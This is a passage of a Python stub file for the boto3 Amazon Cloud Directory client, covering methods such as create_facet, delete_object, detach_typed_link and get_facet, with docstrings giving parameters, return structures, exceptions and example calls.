        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.DirectoryAlreadyExistsException
        CloudDirectory.Client.exceptions.ResourceNotFoundException
    """
    pass
def create_facet(SchemaArn=None, Name=None, Attributes=None, ObjectType=None, FacetStyle=None):
    """Create a new Facet in a schema.

    Facet creation is allowed only in development or applied schemas.

    See also: AWS API Documentation

    :example: response = client.create_facet(
        SchemaArn='string',
        Name='string',
        Attributes=[
            {
                'Name': 'string',
                'AttributeDefinition': {
                    'Type': 'STRING'|'BINARY'|'BOOLEAN'|'NUMBER'|'DATETIME'|'VARIANT',
                    'DefaultValue': {
                        'StringValue': 'string',
                        'BinaryValue': b'bytes',
                        'BooleanValue': True|False,
                        'NumberValue': 'string',
                        'DatetimeValue': datetime(2015, 1, 1)
                    },
                    'IsImmutable': True|False,
                    'Rules': {
                        'string': {
                            'Type': 'BINARY_LENGTH'|'NUMBER_COMPARISON'|'STRING_FROM_SET'|'STRING_LENGTH',
                            'Parameters': {
                                'string': 'string'
                            }
                        }
                    }
                },
                'AttributeReference': {
                    'TargetFacetName': 'string',
                    'TargetAttributeName': 'string'
                },
                'RequiredBehavior': 'REQUIRED_ALWAYS'|'NOT_REQUIRED'
            },
        ],
        ObjectType='NODE'|'LEAF_NODE'|'POLICY'|'INDEX',
        FacetStyle='STATIC'|'DYNAMIC'
    )

    :type SchemaArn: string
    :param SchemaArn: [REQUIRED] The schema ARN in which the new Facet will
        be created. For more information, see arns.

    :type Name: string
    :param Name: [REQUIRED] The name of the Facet, which is unique for a
        given schema.

    :type Attributes: list
    :param Attributes: The attributes that are associated with the Facet.
        Each entry is a dict with:

        * ``Name`` (string, REQUIRED) -- the name of the facet attribute.
        * ``AttributeDefinition`` (dict) -- the attribute definition (a facet
          attribute consists of either a definition or a reference; see
          Attribute References). Contains ``Type`` (string, REQUIRED),
          ``DefaultValue`` (dict of StringValue/BinaryValue/BooleanValue/
          NumberValue/DatetimeValue), ``IsImmutable`` (boolean) and ``Rules``
          (dict mapping rule name to a dict with ``Type`` — the validation
          rule type — and ``Parameters``, the min/max parameters for the rule).
        * ``AttributeReference`` (dict) -- an attribute reference with
          ``TargetFacetName`` (string, REQUIRED) and ``TargetAttributeName``
          (string, REQUIRED). See Attribute References for more information.
        * ``RequiredBehavior`` (string) -- the required behavior of the
          FacetAttribute.

    :type ObjectType: string
    :param ObjectType: Specifies whether a given object created from this
        facet is of type node, leaf node, policy or index.

        * Node: Can have multiple children but one parent.
        * Leaf node: Cannot have children but can have multiple parents.
        * Policy: Allows you to store a policy document and policy type. For
          more information, see Policies.
        * Index: Can be created with the Index API.

    :type FacetStyle: string
    :param FacetStyle: There are two different styles that you can define on
        any given facet, Static and Dynamic. For static facets, all
        attributes must be defined in the schema. For dynamic facets,
        attributes can be defined during data plane operations.

    :rtype: dict
    :return: {} (empty response structure)

    :raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.ResourceNotFoundException
        CloudDirectory.Client.exceptions.FacetAlreadyExistsException
        CloudDirectory.Client.exceptions.InvalidRuleException
        CloudDirectory.Client.exceptions.FacetValidationException
    """
    pass
def create_index(DirectoryArn=None, OrderedIndexedAttributeList=None, IsUnique=None, ParentReference=None, LinkName=None):
    """Create an index object.

    See Indexing and search for more information.

    See also: AWS API Documentation

    :example: response = client.create_index(
        DirectoryArn='string',
        OrderedIndexedAttributeList=[
            {
                'SchemaArn': 'string',
                'FacetName': 'string',
                'Name': 'string'
            },
        ],
        IsUnique=True|False,
        ParentReference={
            'Selector': 'string'
        },
        LinkName='string'
    )

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The ARN of the directory where the index
        should be created.

    :type OrderedIndexedAttributeList: list
    :param OrderedIndexedAttributeList: [REQUIRED] Specifies the attributes
        that should be indexed on. Currently only a single attribute is
        supported. Each entry is an attribute key dict with ``SchemaArn``
        (string, REQUIRED: ARN of the schema that contains the facet and
        attribute), ``FacetName`` (string, REQUIRED: name of the facet that
        the attribute exists within) and ``Name`` (string, REQUIRED: name of
        the attribute).

    :type IsUnique: boolean
    :param IsUnique: [REQUIRED] Indicates whether the attribute that is being
        indexed has unique values or not.

    :type ParentReference: dict
    :param ParentReference: A reference to the parent object that contains
        the index object. Contains ``Selector`` (string), a path selector
        that identifies an object in one of the following ways:

        * ``$ObjectIdentifier`` - an opaque identifier provided by Amazon
          Cloud Directory; immutable, and no two objects ever share one
        * ``/some/path`` - identifies the object based on path (slash-
          separated link names from the directory root; see Access Objects)
        * ``#SomeBatchReference`` - identifies the object in a batch call

    :type LinkName: string
    :param LinkName: The name of the link between the parent object and the
        index object.

    :rtype: dict
    :return: {
            'ObjectIdentifier': 'string'  # ObjectIdentifier of the index created
        }

    :raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.DirectoryNotEnabledException
        CloudDirectory.Client.exceptions.ResourceNotFoundException
        CloudDirectory.Client.exceptions.FacetValidationException
        CloudDirectory.Client.exceptions.LinkNameAlreadyInUseException
        CloudDirectory.Client.exceptions.UnsupportedIndexTypeException
    """
    pass
def create_object(DirectoryArn=None, SchemaFacets=None, ObjectAttributeList=None, ParentReference=None, LinkName=None):
    """Create an object in a Directory.

    Additionally attaches the object to a parent, if a parent reference and
    LinkName is specified. An object is simply a collection of Facet
    attributes. You can also use this API call to create a policy object, if
    the facet from which you create the object is a policy facet.

    See also: AWS API Documentation

    :example: response = client.create_object(
        DirectoryArn='string',
        SchemaFacets=[
            {
                'SchemaArn': 'string',
                'FacetName': 'string'
            },
        ],
        ObjectAttributeList=[
            {
                'Key': {
                    'SchemaArn': 'string',
                    'FacetName': 'string',
                    'Name': 'string'
                },
                'Value': {
                    'StringValue': 'string',
                    'BinaryValue': b'bytes',
                    'BooleanValue': True|False,
                    'NumberValue': 'string',
                    'DatetimeValue': datetime(2015, 1, 1)
                }
            },
        ],
        ParentReference={
            'Selector': 'string'
        },
        LinkName='string'
    )

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The Amazon Resource Name (ARN) that is
        associated with the Directory in which the object will be created.
        For more information, see arns.

    :type SchemaFacets: list
    :param SchemaFacets: [REQUIRED] A list of schema facets to be associated
        with the object. Do not provide minor version components; see
        SchemaFacet for details. Each entry is a dict with ``SchemaArn``
        (string: ARN of the schema containing the facet, with no minor
        component — see arns and In-Place Schema Upgrade for when to provide
        minor versions) and ``FacetName`` (string: the name of the facet).

    :type ObjectAttributeList: list
    :param ObjectAttributeList: The attribute map whose attribute ARN
        contains the key and attribute value as the map value. Each entry is
        a key/value pair:

        * ``Key`` (dict, REQUIRED) -- attribute key with ``SchemaArn``
          (string, REQUIRED), ``FacetName`` (string, REQUIRED) and ``Name``
          (string, REQUIRED).
        * ``Value`` (dict, REQUIRED) -- the attribute value, one of
          ``StringValue``, ``BinaryValue``, ``BooleanValue``, ``NumberValue``
          or ``DatetimeValue``.

    :type ParentReference: dict
    :param ParentReference: If specified, the parent reference to which this
        object will be attached. Contains ``Selector`` (string), a path
        selector that identifies an object in one of the following ways:

        * ``$ObjectIdentifier`` - an opaque identifier provided by Amazon
          Cloud Directory; immutable, and no two objects ever share one
        * ``/some/path`` - identifies the object based on path (slash-
          separated link names from the directory root; see Access Objects)
        * ``#SomeBatchReference`` - identifies the object in a batch call

    :type LinkName: string
    :param LinkName: The name of link that is used to attach this object to
        a parent.

    :rtype: dict
    :return: {
            'ObjectIdentifier': 'string'  # identifier associated with the object
        }

    :raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.DirectoryNotEnabledException
        CloudDirectory.Client.exceptions.ResourceNotFoundException
        CloudDirectory.Client.exceptions.FacetValidationException
        CloudDirectory.Client.exceptions.LinkNameAlreadyInUseException
        CloudDirectory.Client.exceptions.UnsupportedIndexTypeException
    """
    pass
def create_schema(Name=None):
    """Create a new schema in a development state.

    A schema can exist in three phases:

    * Development: This is a mutable phase of the schema. All new schemas
      are in the development phase. Once the schema is finalized, it can be
      published.
    * Published: Published schemas are immutable and have a version
      associated with them.
    * Applied: Applied schemas are mutable in a way that allows you to add
      new schema facets. You can also add new, nonrequired attributes to
      existing schema facets. You can apply only published schemas to
      directories.

    See also: AWS API Documentation

    :example: response = client.create_schema(
        Name='string'
    )

    :type Name: string
    :param Name: [REQUIRED] The name that is associated with the schema.
        This is unique to each account and in each region.

    :rtype: dict
    :return: {
            'SchemaArn': 'string'  # ARN associated with the schema; see arns
        }

    :raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.SchemaAlreadyExistsException
    """
    # NOTE: the generated docstring previously ended mid-sentence ("three
    # phases:") and listed AccessDeniedException twice; both fixed here per
    # the AWS CloudDirectory CreateSchema API reference.
    pass
def create_typed_link_facet(SchemaArn=None, Facet=None):
    """Create a TypedLinkFacet.

    For more information, see Typed Links.

    See also: AWS API Documentation

    :example: response = client.create_typed_link_facet(
        SchemaArn='string',
        Facet={
            'Name': 'string',
            'Attributes': [
                {
                    'Name': 'string',
                    'Type': 'STRING'|'BINARY'|'BOOLEAN'|'NUMBER'|'DATETIME'|'VARIANT',
                    'DefaultValue': {
                        'StringValue': 'string',
                        'BinaryValue': b'bytes',
                        'BooleanValue': True|False,
                        'NumberValue': 'string',
                        'DatetimeValue': datetime(2015, 1, 1)
                    },
                    'IsImmutable': True|False,
                    'Rules': {
                        'string': {
                            'Type': 'BINARY_LENGTH'|'NUMBER_COMPARISON'|'STRING_FROM_SET'|'STRING_LENGTH',
                            'Parameters': {
                                'string': 'string'
                            }
                        }
                    },
                    'RequiredBehavior': 'REQUIRED_ALWAYS'|'NOT_REQUIRED'
                },
            ],
            'IdentityAttributeOrder': [
                'string',
            ]
        }
    )

    :type SchemaArn: string
    :param SchemaArn: [REQUIRED] The Amazon Resource Name (ARN) that is
        associated with the schema. For more information, see arns.

    :type Facet: dict
    :param Facet: [REQUIRED] Facet structure that is associated with the
        typed link facet:

        * ``Name`` (string, REQUIRED) -- the unique name of the typed link
          facet.
        * ``Attributes`` (list, REQUIRED) -- a set of key-value pairs
          associated with the typed link. Typed link attributes are used
          when you have data values that are related to the link itself, and
          not to one of the two objects being linked. Identity attributes
          also serve to distinguish the link from others of the same type
          between the same objects. Each attribute definition has ``Name``
          (string, REQUIRED), ``Type`` (string, REQUIRED), ``DefaultValue``
          (dict of StringValue/BinaryValue/BooleanValue/NumberValue/
          DatetimeValue), ``IsImmutable`` (boolean), ``Rules`` (dict mapping
          rule name to ``Type`` and ``Parameters``) and ``RequiredBehavior``
          (string, REQUIRED).
        * ``IdentityAttributeOrder`` (list of string, REQUIRED) -- the set of
          attributes that distinguish links made from this facet from each
          other, in the order of significance. Listing typed links can
          filter on the values of these attributes. See
          ListOutgoingTypedLinks and ListIncomingTypedLinks for details.

    :rtype: dict
    :return: {} (empty response structure)

    :raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.ResourceNotFoundException
        CloudDirectory.Client.exceptions.FacetAlreadyExistsException
        CloudDirectory.Client.exceptions.InvalidRuleException
        CloudDirectory.Client.exceptions.FacetValidationException
    """
    pass
def delete_directory(DirectoryArn=None):
    """Delete a directory.

    Only disabled directories can be deleted. A deleted directory cannot be
    undone. Exercise extreme caution when deleting directories.

    See also: AWS API Documentation

    :example: response = client.delete_directory(
        DirectoryArn='string'
    )

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The ARN of the directory to delete.

    :rtype: dict
    :return: {
            'DirectoryArn': 'string'  # ARN of the deleted directory
        }

    :raises:
        CloudDirectory.Client.exceptions.ResourceNotFoundException
        CloudDirectory.Client.exceptions.DirectoryNotDisabledException
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.DirectoryDeletedException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.InvalidArnException
    """
    pass
def delete_facet(SchemaArn=None, Name=None):
    """Delete a given Facet.

    All attributes and Rules that are associated with the facet will be
    deleted. Only development schema facets are allowed deletion.

    See also: AWS API Documentation

    :example: response = client.delete_facet(
        SchemaArn='string',
        Name='string'
    )

    :type SchemaArn: string
    :param SchemaArn: [REQUIRED] The Amazon Resource Name (ARN) that is
        associated with the Facet. For more information, see arns.

    :type Name: string
    :param Name: [REQUIRED] The name of the facet to delete.

    :rtype: dict
    :return: {} (empty response structure)

    :raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.ResourceNotFoundException
        CloudDirectory.Client.exceptions.FacetNotFoundException
        CloudDirectory.Client.exceptions.FacetInUseException
    """
    pass
def delete_object(DirectoryArn=None, ObjectReference=None):
    """
    Delete an object together with its associated attributes. Only objects
    with no children and no parents can be deleted; at most 30 attributes
    may be deleted as part of a single object deletion. For more
    information, see Amazon Cloud Directory Limits.

    See also: AWS API Documentation

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The Amazon Resource Name (ARN) that is
        associated with the Directory where the object resides. For more
        information, see arns.
    :type ObjectReference: dict
    :param ObjectReference: [REQUIRED] A reference that identifies the
        object. The single key is:

        Selector (string) -- A path selector identifying the object in one
        of the following ways:

        * ``$ObjectIdentifier`` - an opaque, immutable identifier supplied
          by Amazon Cloud Directory when the object was created
        * ``/some/path`` - identifies the object by its parent/child link
          path from the directory root (link names separated by slashes)
        * ``#SomeBatchReference`` - identifies the object in a batch call

    :rtype: dict
    :return: {} (empty response on success)

    Raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.DirectoryNotEnabledException
        CloudDirectory.Client.exceptions.ResourceNotFoundException
        CloudDirectory.Client.exceptions.ObjectNotDetachedException

    Example::

        response = client.delete_object(
            DirectoryArn='string',
            ObjectReference={'Selector': 'string'}
        )
    """
    pass
def delete_schema(SchemaArn=None):
    """
    Delete a given schema. Only schemas in the development or published
    state can be deleted.

    See also: AWS API Documentation

    :type SchemaArn: string
    :param SchemaArn: [REQUIRED] The Amazon Resource Name (ARN) of the
        development schema. For more information, see arns.

    :rtype: dict
    :return: ::

        {
            'SchemaArn': 'string'
        }

        SchemaArn (string) -- The input ARN that is returned as part of
        the response. For more information, see arns.

    Raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.ResourceNotFoundException
        CloudDirectory.Client.exceptions.StillContainsLinksException

    Example::

        response = client.delete_schema(
            SchemaArn='string'
        )
    """
    pass
def delete_typed_link_facet(SchemaArn=None, Name=None):
    """
    Delete a TypedLinkFacet. For more information, see Typed Links.

    See also: AWS API Documentation

    :type SchemaArn: string
    :param SchemaArn: [REQUIRED] The Amazon Resource Name (ARN) that is
        associated with the schema. For more information, see arns.
    :type Name: string
    :param Name: [REQUIRED] The unique name of the typed link facet.

    :rtype: dict
    :return: {} (empty response on success)

    Raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.ResourceNotFoundException
        CloudDirectory.Client.exceptions.FacetNotFoundException

    Example::

        response = client.delete_typed_link_facet(
            SchemaArn='string',
            Name='string'
        )
    """
    pass
def detach_from_index(DirectoryArn=None, IndexReference=None, TargetReference=None):
    """
    Detach the specified object from the specified index.

    See also: AWS API Documentation

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The Amazon Resource Name (ARN) of the
        directory in which the index and object exist.
    :type IndexReference: dict
    :param IndexReference: [REQUIRED] A reference to the index object.
        Contains a single key:

        Selector (string) -- A path selector identifying the object in one
        of the following ways:

        * ``$ObjectIdentifier`` - an opaque, immutable identifier supplied
          by Amazon Cloud Directory when the object was created
        * ``/some/path`` - identifies the object by its parent/child link
          path from the directory root (link names separated by slashes)
        * ``#SomeBatchReference`` - identifies the object in a batch call
    :type TargetReference: dict
    :param TargetReference: [REQUIRED] A reference to the object being
        detached from the index. Same ``Selector`` structure as
        ``IndexReference``.

    :rtype: dict
    :return: ::

        {
            'DetachedObjectIdentifier': 'string'
        }

        DetachedObjectIdentifier (string) -- The ObjectIdentifier of the
        object that was detached from the index.

    Raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.DirectoryNotEnabledException
        CloudDirectory.Client.exceptions.ResourceNotFoundException
        CloudDirectory.Client.exceptions.ObjectAlreadyDetachedException
        CloudDirectory.Client.exceptions.NotIndexException

    Example::

        response = client.detach_from_index(
            DirectoryArn='string',
            IndexReference={'Selector': 'string'},
            TargetReference={'Selector': 'string'}
        )
    """
    pass
def detach_object(DirectoryArn=None, ParentReference=None, LinkName=None):
    """
    Detach a given object from its parent object. The object to detach is
    identified by the link name on the parent.

    See also: AWS API Documentation

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The Amazon Resource Name (ARN) that is
        associated with the Directory where objects reside. For more
        information, see arns.
    :type ParentReference: dict
    :param ParentReference: [REQUIRED] The parent reference from which the
        object with the specified link name is detached. Contains a single
        key:

        Selector (string) -- A path selector identifying the object in one
        of the following ways:

        * ``$ObjectIdentifier`` - an opaque, immutable identifier supplied
          by Amazon Cloud Directory when the object was created
        * ``/some/path`` - identifies the object by its parent/child link
          path from the directory root (link names separated by slashes)
        * ``#SomeBatchReference`` - identifies the object in a batch call
    :type LinkName: string
    :param LinkName: [REQUIRED] The link name associated with the object
        that needs to be detached.

    :rtype: dict
    :return: ::

        {
            'DetachedObjectIdentifier': 'string'
        }

        DetachedObjectIdentifier (string) -- The ObjectIdentifier that was
        detached from the object.

    Raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.DirectoryNotEnabledException
        CloudDirectory.Client.exceptions.ResourceNotFoundException
        CloudDirectory.Client.exceptions.NotNodeException

    Example::

        response = client.detach_object(
            DirectoryArn='string',
            ParentReference={'Selector': 'string'},
            LinkName='string'
        )
    """
    pass
def detach_policy(DirectoryArn=None, PolicyReference=None, ObjectReference=None):
    """
    Detach a policy from an object.

    See also: AWS API Documentation

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The Amazon Resource Name (ARN) that is
        associated with the Directory where both objects reside. For more
        information, see arns.
    :type PolicyReference: dict
    :param PolicyReference: [REQUIRED] Reference that identifies the
        policy object. Contains a single key:

        Selector (string) -- A path selector identifying the object in one
        of the following ways:

        * ``$ObjectIdentifier`` - an opaque, immutable identifier supplied
          by Amazon Cloud Directory when the object was created
        * ``/some/path`` - identifies the object by its parent/child link
          path from the directory root (link names separated by slashes)
        * ``#SomeBatchReference`` - identifies the object in a batch call
    :type ObjectReference: dict
    :param ObjectReference: [REQUIRED] Reference that identifies the
        object whose policy object will be detached. Same ``Selector``
        structure as ``PolicyReference``.

    :rtype: dict
    :return: {} (empty response on success)

    Raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.DirectoryNotEnabledException
        CloudDirectory.Client.exceptions.ResourceNotFoundException
        CloudDirectory.Client.exceptions.NotPolicyException

    Example::

        response = client.detach_policy(
            DirectoryArn='string',
            PolicyReference={'Selector': 'string'},
            ObjectReference={'Selector': 'string'}
        )
    """
    pass
def detach_typed_link(DirectoryArn=None, TypedLinkSpecifier=None):
    """
    Detach a typed link from a specified source and target object. For
    more information, see Typed Links.

    See also: AWS API Documentation

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The Amazon Resource Name (ARN) of the
        directory where you want to detach the typed link.
    :type TypedLinkSpecifier: dict
    :param TypedLinkSpecifier: [REQUIRED] Used to accept a typed link
        specifier as input. Structure:

        * TypedLinkFacet (dict) -- [REQUIRED] Identifies the typed link
          facet associated with the typed link:

          * SchemaArn (string) -- [REQUIRED] The ARN associated with the
            schema. For more information, see arns.
          * TypedLinkName (string) -- [REQUIRED] The unique name of the
            typed link facet.

        * SourceObjectReference (dict) -- [REQUIRED] Identifies the source
          object the typed link attaches to. ``Selector`` (string) may be
          ``$ObjectIdentifier``, a ``/some/path`` selector, or a
          ``#SomeBatchReference``.
        * TargetObjectReference (dict) -- [REQUIRED] Identifies the target
          object the typed link attaches to. Same ``Selector`` structure.
        * IdentityAttributeValues (list) -- [REQUIRED] Identifies the
          attribute values of the link. Each element:

          * AttributeName (string) -- [REQUIRED] The attribute name of the
            typed link.
          * Value (dict) -- [REQUIRED] The value for the typed link, as
            one of ``StringValue`` (string), ``BinaryValue`` (bytes),
            ``BooleanValue`` (boolean), ``NumberValue`` (string), or
            ``DatetimeValue`` (datetime).

    Raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.DirectoryNotEnabledException
        CloudDirectory.Client.exceptions.ResourceNotFoundException
        CloudDirectory.Client.exceptions.FacetValidationException

    Example::

        response = client.detach_typed_link(
            DirectoryArn='string',
            TypedLinkSpecifier={
                'TypedLinkFacet': {
                    'SchemaArn': 'string',
                    'TypedLinkName': 'string'
                },
                'SourceObjectReference': {'Selector': 'string'},
                'TargetObjectReference': {'Selector': 'string'},
                'IdentityAttributeValues': [
                    {
                        'AttributeName': 'string',
                        'Value': {
                            'StringValue': 'string',
                            'BinaryValue': b'bytes',
                            'BooleanValue': True|False,
                            'NumberValue': 'string',
                            'DatetimeValue': datetime(2015, 1, 1)
                        }
                    },
                ]
            }
        )
    """
    pass
def disable_directory(DirectoryArn=None):
    """
    Disable the specified directory. Disabled directories cannot be read
    or written to; only enabled directories can be disabled, and disabled
    directories may later be re-enabled.

    See also: AWS API Documentation

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The ARN of the directory to disable.

    :rtype: dict
    :return: ::

        {
            'DirectoryArn': 'string'
        }

        DirectoryArn (string) -- The ARN of the directory that has been
        disabled.

    Raises:
        CloudDirectory.Client.exceptions.ResourceNotFoundException
        CloudDirectory.Client.exceptions.DirectoryDeletedException
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.InvalidArnException

    Example::

        response = client.disable_directory(
            DirectoryArn='string'
        )
    """
    pass
def enable_directory(DirectoryArn=None):
    """
    Enable the specified directory. Only disabled directories can be
    enabled; once enabled, the directory can be read and written to.

    See also: AWS API Documentation

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The ARN of the directory to enable.

    :rtype: dict
    :return: ::

        {
            'DirectoryArn': 'string'
        }

        DirectoryArn (string) -- The ARN of the enabled directory.

    Raises:
        CloudDirectory.Client.exceptions.ResourceNotFoundException
        CloudDirectory.Client.exceptions.DirectoryDeletedException
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.InvalidArnException

    Example::

        response = client.enable_directory(
            DirectoryArn='string'
        )
    """
    pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
    """
    Generate a presigned URL given a client, its method, and arguments.

    :type ClientMethod: string
    :param ClientMethod: The client method to presign for.
    :type Params: dict
    :param Params: The parameters normally passed to ``ClientMethod``.
    :type ExpiresIn: int
    :param ExpiresIn: The number of seconds the presigned URL is valid
        for. By default it expires in an hour (3600 seconds).
    :type HttpMethod: string
    :param HttpMethod: The HTTP method to use on the generated URL. By
        default, the HTTP method is whatever is used in the method's model.
    """
    pass
def get_applied_schema_version(SchemaArn=None):
    """
    Return the current applied schema version ARN, including the minor
    version in use.

    See also: AWS API Documentation

    :type SchemaArn: string
    :param SchemaArn: [REQUIRED] The ARN of the applied schema.

    :rtype: dict
    :return: ::

        {
            'AppliedSchemaArn': 'string'
        }

        AppliedSchemaArn (string) -- Current applied schema ARN, including
        the minor version in use if one was provided.

    Raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException
        CloudDirectory.Client.exceptions.ResourceNotFoundException

    Example::

        response = client.get_applied_schema_version(
            SchemaArn='string'
        )
    """
    pass
def get_directory(DirectoryArn=None):
    """
    Retrieve metadata about a directory.

    See also: AWS API Documentation

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The ARN of the directory.

    :rtype: dict
    :return: ::

        {
            'Directory': {
                'Name': 'string',
                'DirectoryArn': 'string',
                'State': 'ENABLED'|'DISABLED'|'DELETED',
                'CreationDateTime': datetime(2015, 1, 1)
            }
        }

        Directory (dict) -- Metadata about the directory:

        * Name (string) -- The name of the directory.
        * DirectoryArn (string) -- The Amazon Resource Name (ARN)
          associated with the directory. For more information, see arns.
        * State (string) -- The state of the directory; one of Enabled,
          Disabled, or Deleted.
        * CreationDateTime (datetime) -- The date and time when the
          directory was created.

    Raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
        CloudDirectory.Client.exceptions.RetryableConflictException
        CloudDirectory.Client.exceptions.ValidationException
        CloudDirectory.Client.exceptions.LimitExceededException
        CloudDirectory.Client.exceptions.AccessDeniedException

    Example::

        response = client.get_directory(
            DirectoryArn='string'
        )
    """
    pass
def get_facet(SchemaArn=None, Name=None):
    """
    Get details of a Facet, such as its name, attributes, Rules, or
    ObjectType. This can be called on every kind of schema facet:
    published, development, or applied.

    See also: AWS API Documentation

    :type SchemaArn: string
    :param SchemaArn: [REQUIRED] The Amazon Resource Name (ARN) that is
        associated with the Facet. For more information, see arns.
    :type Name: string
    :param Name: [REQUIRED] The name of the facet to retrieve.

    :rtype: dict
    :return: ::

        {
            'Facet': {
                'Name': 'string',
                'ObjectType': 'NODE'|'LEAF_NODE'|'POLICY'|'INDEX',
                'FacetStyle': 'STATIC'|'DYNAMIC'
            }
        }

        Facet (dict) -- The Facet structure associated with the facet:

        * Name (string) -- The name of the Facet.
        * ObjectType (string) -- The object type associated with the
          facet. See CreateFacetRequest$ObjectType for more details.
